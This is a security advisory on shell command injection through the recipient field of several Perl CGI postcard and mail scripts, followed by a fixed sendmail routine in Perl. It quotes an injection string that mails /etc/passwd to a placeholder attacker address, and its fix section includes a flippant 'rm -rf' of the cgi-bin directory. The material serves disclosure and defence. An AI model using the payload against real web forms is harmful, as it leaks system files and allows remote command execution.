COMMAND

    CGIs

SYSTEMS AFFECTED

    Systems running CGI scripts mentioned below

PROBLEM

    The following is based mostly on xnec's post.  After looking over
    the Perl CGI scripts on www.cgi-resources.com, he discovered
    vulnerabilities in the following:

        1. HAMcards Postcard script v1.0 Beta 2
           (www.hamnetcenter.com)
        2. Hot Postal Services v??
           (www.hotarea.com)
           note: the only metacharacter stripping this script does is
           rejecting any |'s
        3. RC Bowen's Postcards v??
           (www.rcbowen.com)
        4. LakeWeb's File Mail and Mail List (expanded File Mail) v??
           (www.lakeweb.com)

    Each of these is exploitable by inputting shell metacharacters
    into the recipient's email address.  The address is interpolated
    into a command string that Perl hands to the shell.  Each script
    calls something similar to:

        open( MAIL, "|$mailprog $email" )
        # this particular line is from the LakeWeb scripts

    The exploit strings are simple, something like

        &mail evil@foobar.com < /etc/passwd&@host.com

    will work for each script when placed in the Recipient Email field
    (the @host.com is necessary because some hosts check for "@" and
    ".").  As a result, any command can be executed remotely, without
    a local account, with the uid of the webserver (usually "nobody"
    or similar, but you never know).

    As a related note, the WebCards program (V1.6) by Sam Kareem
    (webmaster@iraq.net) is subject to the same vulnerability
    (reported by Karl Hanmore).

SOLUTION

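    Use open(MAIL, "|$sendmail -t") or use Net::SMTP to pass the data
    directly to port 25, or simply rm -rf ./cgi-bin.  With -t,
    sendmail reads the recipients from the message headers, so the
    address never appears on the shell command line.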
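
    The sendmail -t approach, as an added example that is not code
    from any of the scripts named above.  The sendmail path and the
    helper names valid_recipient and send_card are assumptions; the
    address check is needed because under -t a CR/LF in the recipient
    would add extra headers.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Assumed path; adjust for the host. Not taken from any script in the advisory.
my $sendmail = '/usr/sbin/sendmail';

# Hypothetical helper: conservative address check. One "@", no whitespace,
# no shell metacharacters, and no CR/LF (which would inject headers under -t).
# \A and \z anchor the whole string, so a trailing newline is not accepted.
sub valid_recipient {
    my ($addr) = @_;
    return 0 unless defined $addr && length($addr) <= 254;
    return $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/ ? 1 : 0;
}

# Hypothetical helper: send one message without involving a shell.
sub send_card {
    my ($to, $subject, $body) = @_;
    die "rejected recipient\n" unless valid_recipient($to);
    $subject =~ s/[\r\n]+/ /g;    # keep the subject on a single header line

    # List-form pipe open: sendmail is exec'd directly, so no /bin/sh ever
    # parses the arguments. The recipient is not on the command line at all;
    # -t makes sendmail read it from the To: header written below.
    open(my $mail, '|-', $sendmail, '-t', '-oi')
        or die "cannot start $sendmail: $!\n";
    print {$mail} "To: $to\n";
    print {$mail} "Subject: $subject\n\n";
    print {$mail} $body, "\n";
    close($mail) or die "sendmail exited with status $?\n";
    return 1;
}

# Constructed inputs: the string quoted in the advisory and an ordinary address.
# Only the validator is exercised here, so running this file sends no mail.
for my $addr ('&mail evil@foobar.com < /etc/passwd&@host.com',
              'friend@example.com') {
    printf "%-48s %s\n", $addr, valid_recipient($addr) ? 'accepted' : 'rejected';
}
```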